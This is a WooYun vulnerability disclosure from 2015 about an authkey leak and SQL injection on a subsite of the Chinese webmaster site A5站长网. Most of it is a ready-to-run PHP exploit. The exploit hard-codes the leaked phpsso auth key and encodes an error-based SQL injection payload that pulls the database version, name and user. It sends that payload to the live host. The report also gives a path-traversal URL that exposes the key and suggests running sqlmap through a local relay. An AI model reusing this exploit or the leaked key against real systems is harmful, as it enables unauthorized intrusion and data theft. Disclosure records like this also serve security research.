当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151660

漏洞标题:A5站长网某分站authkey信息泄漏可注入

相关厂商:A5站长网

漏洞作者: 岛云首席鉴黄师

提交时间:2015-11-04 09:41

修复时间:2015-11-09 09:42

公开时间:2015-11-09 09:42

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

……

详细说明:

http://app.a5.net//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin


1.png


EXP:

<?php
set_time_limit(0);
$wang_url = 'http://app.a5.net/';
echo $wang_url."\r\n";
$auth_key = 'B0OMEnTn7mFTVppclR8E9qNIMikQPq6I';
//$str = "uid=".stripslashes($_GET['id']);
$str = "uid=1' and (select 1 from (select count(*),concat(version(),0x5f5f,database(),0x5f5f,user(),floor(rand()*2))x from information_schema.tables group by x)a);#";
$encode = sys_auth($str, 'ENCODE', $auth_key);
$allurl=($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);
$content = file_get_contents($allurl);
//header("Location: $allurl"); 
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
         $key_length = 4;
         $key = md5($key);
         $fixedkey = hash('md5', $key);
         $egiskeys = md5(substr($fixedkey, 16, 16));
         $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
         $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
         $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr
($string, $key_length));
         $i = 0; $result = '';
         $string_length = strlen($string);
         for ($i = 0; $i < $string_length; $i++){
                   $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
         }
         if($operation == 'ENCODE') {
                   return $runtokey . str_replace('=', '', base64_encode($result));
         } else {
                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 
16)) {
                            return substr($result, 26);
                   } else {
                            return '';
                   }
         }
}
//或者直接$str = "uid=1";然后放sqlmap里面跑起来。速度挺快的。
///api.php?op=get_menu&act=ajax_getlist&callback=t00ls&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
?>


本地中转注入即可

漏洞证明:

如上

修复方案:

升级修复

版权声明:转载请注明来源 岛云首席鉴黄师@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-09 09:42

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无